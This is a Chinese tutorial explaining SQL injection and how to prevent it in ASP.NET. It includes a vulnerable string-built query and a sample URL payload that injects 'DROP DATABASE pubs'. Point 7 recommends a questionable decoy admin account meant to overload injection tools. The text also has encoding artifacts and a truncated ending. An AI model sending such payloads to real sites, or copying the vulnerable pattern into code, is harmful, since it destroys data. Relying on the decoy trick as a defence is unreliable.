　　對(duì)通過Google搜尋找到的1000個(gè)網(wǎng)站的隨機(jī)取樣測(cè)試，他檢測(cè)到其中的11.3%有易受SQL注入攻擊的可能。這非常，非常地可怕。這意味著黑客可以遠(yuǎn)程利用那些應(yīng)用里的數(shù)據(jù)，獲取任何沒有hashed或加密的密碼或信用卡數(shù)據(jù)，甚至有以管理員身份登陸進(jìn)這些應(yīng)用的可能。這不僅對(duì)開發(fā)網(wǎng)站的開發(fā)人員來說很糟糕，而且對(duì)使用網(wǎng)站的消費(fèi)者或用戶來說更糟糕，因?yàn)樗麄兘o網(wǎng)站提供了數(shù)據(jù)，想著網(wǎng)站是安全的呢。
　　那么SQL注入攻擊到底是什么玩意？
　　有幾種情形使得SQL注入攻擊成為可能。最常見的原因是，你動(dòng)態(tài)地構(gòu)造了SQL語句，卻沒有使用正確地加了碼(encoded)的參數(shù)。譬如，考慮這個(gè)SQL查詢的編碼，其目的是根據(jù)由查詢字符串提供的社會(huì)保險(xiǎn)號(hào)碼(social security number)來查詢作者(Authors)：
　　Dim SSN as String
　　Dim SqlQuery as String
　　SSN = Request.QueryString("SSN")
　　SqlQuery = "SELECT au_lname, au_fname FROM authors WHERE au_id = &＃039;" + SSN + "&＃039;"
　　如果你有象上面這個(gè)片斷一樣的SQL編碼，那么你的整個(gè)數(shù)據(jù)庫(kù)和應(yīng)用可以遠(yuǎn)程地被黑掉。怎么會(huì)呢？在普通情形下，用戶會(huì)使用一個(gè)社會(huì)保險(xiǎn)號(hào)碼來訪問這個(gè)網(wǎng)站，編碼是象這樣執(zhí)行的：
　　&＃039; URL to the page containing the above code
　　http://mysite.com/listauthordetails.aspx?SSN=172-32-9999
　　&＃039; SQL Query executed against the database
　　SELECT au_lname, au_fname FROM authors WHERE au_id = &＃039;172-32-9999&＃039;
　　這是開發(fā)人員預(yù)期的做法，通過社會(huì)保險(xiǎn)號(hào)碼來查詢數(shù)據(jù)庫(kù)中作者的信息。但因?yàn)閰?shù)值沒有被正確地加碼，黑客可以很容易地修改查詢字符串的值，在要執(zhí)行的值后面嵌入附加的SQL語句。譬如，
　　&＃039; URL to the page containing the above code
　　http://mysite.com/listauthordetails.aspx?SSN=172-32-9999&＃039;;DROP DATABASE pubs --
　　&＃039; SQL Query executed against the database
　　SELECT au_lname, au_fname FROM authors WHERE au_id = &＃039;&＃039;;DROP DATABASE pubs --
　　注意到?jīng)]有，可以在SSN查詢字符串值的后面添加“ &＃039;;DROP DATABASE pubs -- ”，通過 “;”字符來終止當(dāng)前的SQL語句，然后添加了自己的惡意的SQL語句，然后把語句的其他部分用“--”字符串注釋掉。因?yàn)槭鞘止ぴ诰幋a里構(gòu)造SQL語句，最后把這個(gè)字符串傳給了數(shù)據(jù)庫(kù)，數(shù)據(jù)庫(kù)會(huì)先對(duì)authors表進(jìn)行查詢，然后把我們的pubs數(shù)據(jù)庫(kù)刪除�！芭�(bang)”的一聲，數(shù)據(jù)庫(kù)就沒了！
　　萬一你認(rèn)為匿名黑客刪除你的數(shù)據(jù)庫(kù)的結(jié)果很壞，但不幸的是，實(shí)際上，這在SQL注入攻擊所涉及的情形中算是比較好的。一個(gè)黑客可以不單純摧毀數(shù)據(jù)，而是使用上面這個(gè)編碼的弱點(diǎn)，執(zhí)行一個(gè)JOIN語句，來獲取你數(shù)據(jù)庫(kù)里的所有數(shù)據(jù)，顯示在頁(yè)面上，允許他們獲取用戶名，密碼，信用卡號(hào)碼等等。他們也可以添加 UPDATE/INSERT 語句改變產(chǎn)品的價(jià)格，添加新的管理員賬號(hào)，真的搞砸你(screw up your life)呢。想象一下，到月底檢查庫(kù)存時(shí)，發(fā)現(xiàn)你庫(kù)房里的實(shí)際產(chǎn)品數(shù)與你的賬目系統(tǒng)(accounting system)匯報(bào)的數(shù)目有所不同。
　　如何防范SQL注入攻擊
　　SQL注入攻擊是你需要擔(dān)心的事情，不管你用什么web編程技術(shù)，再說所有的web框架都需要擔(dān)心這個(gè)的。你需要遵循幾條非�；镜囊�(guī)則：
　　1)在構(gòu)造動(dòng)態(tài)SQL語句時(shí)，一定要使用類安全(type-safe)的參數(shù)加碼機(jī)制。大多數(shù)的數(shù)據(jù)API，包括ADO和ADO.NET，有這樣的支持，允許你指定所提供的參數(shù)的確切類型(譬如，字符串，整數(shù)，日期等)，可以保證這些參數(shù)被恰當(dāng)?shù)豦scaped/encoded了，來避免黑客利用它們。一定要從始到終地使用這些特性。
　　例如，在ADO.NET里對(duì)動(dòng)態(tài)SQL，你可以象下面這樣重寫上述的語句，使之安全：
　　Dim SSN as String = Request.QueryString("SSN")
　　Dim cmd As new SqlCommand("SELECT au_lname, au_fname FROM authors WHERE au_id = @au_id")
　　Dim param = new SqlParameter("au_id", SqlDbType.VarChar)
　　param.Value = SSN
　　cmd.Parameters.Add(param)
　　這將防止有人試圖偷偷注入另外的SQL表達(dá)式(因?yàn)锳DO.NET知道對(duì)au_id的字符串值進(jìn)行加碼)，以及避免其他數(shù)據(jù)問題(譬如不正確地轉(zhuǎn)換數(shù)值類型等)。注意，VS 2005內(nèi)置的TableAdapter/DataSet設(shè)計(jì)器自動(dòng)使用這個(gè)機(jī)制，ASP.NET 2.0數(shù)據(jù)源控件也是如此。
　　一個(gè)常見的錯(cuò)誤知覺(misperception)是，假如你使用了存儲(chǔ)過程或ORM，你就完全不受SQL注入攻擊之害了。這是不正確的，你還是需要確定在給存儲(chǔ)過程傳遞數(shù)據(jù)時(shí)你很謹(jǐn)慎，或在用ORM來定制一個(gè)查詢時(shí)，你的做法是安全的。
　　2) 在部署你的應(yīng)用前，始終要做安全審評(píng)(security review)。建立一個(gè)正式的安全過程(formal security process)，在每次你做更新時(shí)，對(duì)所有的編碼做審評(píng)。后面一點(diǎn)特別重要。很多次我聽說開發(fā)隊(duì)伍在正式上線(going live)前會(huì)做很詳細(xì)的安全審評(píng)，然后在幾周或幾個(gè)月之后他們做一些很小的更新時(shí)，他們會(huì)跳過安全審評(píng)這關(guān)，推說，“就是一個(gè)小小的更新，我們以后再做編碼審評(píng)好了”。請(qǐng)始終堅(jiān)持做安全審評(píng)。
　　3) 千萬別把敏感性數(shù)據(jù)在數(shù)據(jù)庫(kù)里以明文存放。我個(gè)人的意見是，密碼應(yīng)該總是在單向(one-way )hashed過后再存放，我甚至不喜歡將它們?cè)诩用芎蟠娣拧Ｔ谀J(rèn)設(shè)置下，ASP.NET 2.0 Membership API 自動(dòng)為你這么做，還同時(shí)實(shí)現(xiàn)了安全的SALT 隨機(jī)化行為(SALT randomization behavior)。如果你決定建立自己的成員數(shù)據(jù)庫(kù)，我建議你查看一下我們?cè)谶@里發(fā)表的我們自己的Membership provider的源碼。同時(shí)也確定對(duì)你的數(shù)據(jù)庫(kù)里的信用卡和其他的私有數(shù)據(jù)進(jìn)行了加密。這樣即使你的數(shù)據(jù)庫(kù)被人入侵(compromised)了的話，起碼你的客戶的私有數(shù)據(jù)不會(huì)被人利用。
　　4)確認(rèn)你編寫了自動(dòng)化的單元測(cè)試，來特別校驗(yàn)?zāi)愕臄?shù)據(jù)訪問層和應(yīng)用程序不受SQL注入攻擊。這么做是非常重要的，有助于捕捉住(catch)“就是一個(gè)小小的更新，所有不會(huì)有安全問題”的情形帶來的疏忽，來提供額外的安全層以避免偶然地引進(jìn)壞的安全缺陷到你的應(yīng)用里去。
　　5)鎖定你的數(shù)據(jù)庫(kù)的安全，只給訪問數(shù)據(jù)庫(kù)的web應(yīng)用功能所需的最低的權(quán)限。如果web應(yīng)用不需要訪問某些表，那么確認(rèn)它沒有訪問這些表的權(quán)限。如果web應(yīng)用只需要只讀的權(quán)限從你的account payables表來生成報(bào)表，那么確認(rèn)你禁止它對(duì)此表的 insert/update/delete 的權(quán)限。
　　6)很多新手從網(wǎng)上下載SQL通用防注入系統(tǒng)的程序，在需要防范注入的頁(yè)面頭部用來防止別人進(jìn)行手動(dòng)注入測(cè)試（。
　　可是如果通過SQL注入分析器就可輕松跳過防注入系統(tǒng)并自動(dòng)分析其注入點(diǎn)。然后只需要幾分鐘，你的管理員賬號(hào)及密碼就會(huì)被分析出來。
　　7)對(duì)于注入分析器的防范，筆者通過實(shí)驗(yàn)，發(fā)現(xiàn)了一種簡(jiǎn)單有效的防范方法。首先我們要知道SQL注入分析器是如何工作的。在操作過程中，發(fā)現(xiàn)軟件并不是沖著“admin”管理員賬號(hào)去的，而是沖著權(quán)限（如flag=1）去的。這樣一來，無論你的管理員賬號(hào)怎么變都無法逃過檢測(cè)。
　　第三步：既然無法逃過檢測(cè)，那我們就做兩個(gè)賬號(hào)，一個(gè)是普通的管理員賬號(hào)，一個(gè)是防止注入的賬號(hào)，為什么這么說呢？筆者想，如果找一個(gè)權(quán)限最大的賬號(hào)制造假象，吸引軟件的檢測(cè)，而這個(gè)賬號(hào)里的內(nèi)容是大于千字以上的中文字符，就會(huì)迫使軟件對(duì)這個(gè)賬號(hào)進(jìn)行分析的時(shí)候進(jìn)入全負(fù)荷狀態(tài)甚至資源耗盡而死機(jī)。下面我們就來修改數(shù)據(jù)庫(kù)吧。
　　1.對(duì)表結(jié)構(gòu)進(jìn)行修改。將管理員的賬號(hào)字段的數(shù)據(jù)類型進(jìn)行修改，文本型改成最大字段255（其實(shí)也夠了，如果還想做得再大點(diǎn)，可以選擇備注型），密碼的字段也進(jìn)行相同設(shè)置。
　　2.對(duì)表進(jìn)行修改。設(shè)置管理員權(quán)限的賬號(hào)放在ID1，并輸入大量中文字符（最好大于100個(gè)字）。
　　3.把真正的管理員密碼放在ID2后的任何一個(gè)位置（如放在ID549上）。
　　由于SQL注入攻擊針對(duì)的是應(yīng)用開發(fā)過程中的編程不嚴(yán)密，因而對(duì)于絕大多數(shù)防火墻來說，這種攻擊是“合法”的。問題的解決只有依賴于完善編程。專門針對(duì)SQL注入攻擊的工具較少，Wpoison對(duì)于用asp，php進(jìn)行的開發(fā)有一定幫助...。

掃碼付費(fèi)即可復(fù)制

SQL注入攻擊

SQL注入攻擊

相關(guān)資料下載

隨機(jī)推薦詞語